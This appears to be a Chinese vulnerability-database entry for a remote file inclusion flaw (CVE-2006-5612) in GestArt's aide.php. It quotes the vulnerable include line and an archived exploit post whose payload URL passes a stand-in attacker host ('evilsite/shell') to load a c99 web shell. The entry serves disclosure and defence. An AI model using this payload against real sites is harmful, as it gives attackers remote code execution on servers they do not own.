GestArt 'Aide.PHP'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112431 漏洞类型 代码注入
发布时间 2007-03-13 更新时间 2007-08-08
CVE编号 CVE-2006-5612 CNNVD-ID CNNVD-200610-521
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3467
https://cxsecurity.com/issue/WLB-2006100157
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-521
|漏洞详情
GestArtbeta1的aide.php3(又称aide.php)中存在PHP远程文件包含漏洞,在启用register_globals的情况下,远程攻击者可以通过aide参数执行任意PHP代码。
|漏洞EXP
.-""""""""-.                                 
                                                         /   Dj7xpl   \                              
                                                        |              |                                
                                                        |,  .-.  .-.  ,|                                
                                                        | )(_o/  \o_)( |                                     
                                                        |/     /\     \|                                 
                                              (@_       (_     ^^     _)                  
                                         _     ) \_______\__|IIIIII|__/_______________________________
                                        (_)@8@8{}<________|-\IIIIII/-|________________________________>
                                               )_/        \          / 
                                               (@
											   
+_______________________________________________Iranian Are The Best In World___________________________________________+
#
#
#   Portal     :   GestArt 
#   Download   :   http://www.phpscripts-fr.net/scripts/scripts.php?cat=Gestion
#   Author     :   Dj7xpl  | Dj7xpl@yahoo.com
#   Risk       :   High (Remote File Inclusion Exploit)
#
+_______________________________________________________________________________________________________________________+


+-------------**************************************** aide.php *********************************************-----------+
#
#
#    <? include("$aide.txt");?> </p>    <<<< line (21)
#
#
+-------------***********************************************************************************************-----------+

+_______________________________________________________________________________________________________________________+
#
#
#    Exploit  :  http://[target]/[path]/aide.php?aide=http://evilsite/shell         <<<<  Shell (Text File)
#    Example  :  http://localhost/getart/aide.php?aide=http://localhost/c99         <<<<  c99.txt
#
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
#
#
#    Sp Tnx      :  Milw0rm, Ashiyane, Delta Hacking, Virangar, Hacker.ir, Shabgard.org,Simorgh .............
#
#
+_______________________________________________________________________________________________________________________+

# milw0rm.com [2007-03-13]
|参考资料

来源:XF
名称:gestart-aide-file-include(29853)
链接:http://xforce.iss.net/xforce/xfdb/29853
来源:BID
名称:20750
链接:http://www.securityfocus.com/bid/20750
来源:BUGTRAQ
名称:20061026GestArt<=vbeta1RemoteFileIncludeVulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/449887/100/0/threaded
来源:MILW0RM
名称:3467
链接:http://www.milw0rm.com/exploits/3467
来源:VUPEN
名称:ADV-2007-0943
链接:http://www.frsirt.com/english/advisories/2007/0943
来源:SREASON
名称:1795
链接:http://securityreason.com/securityalert/1795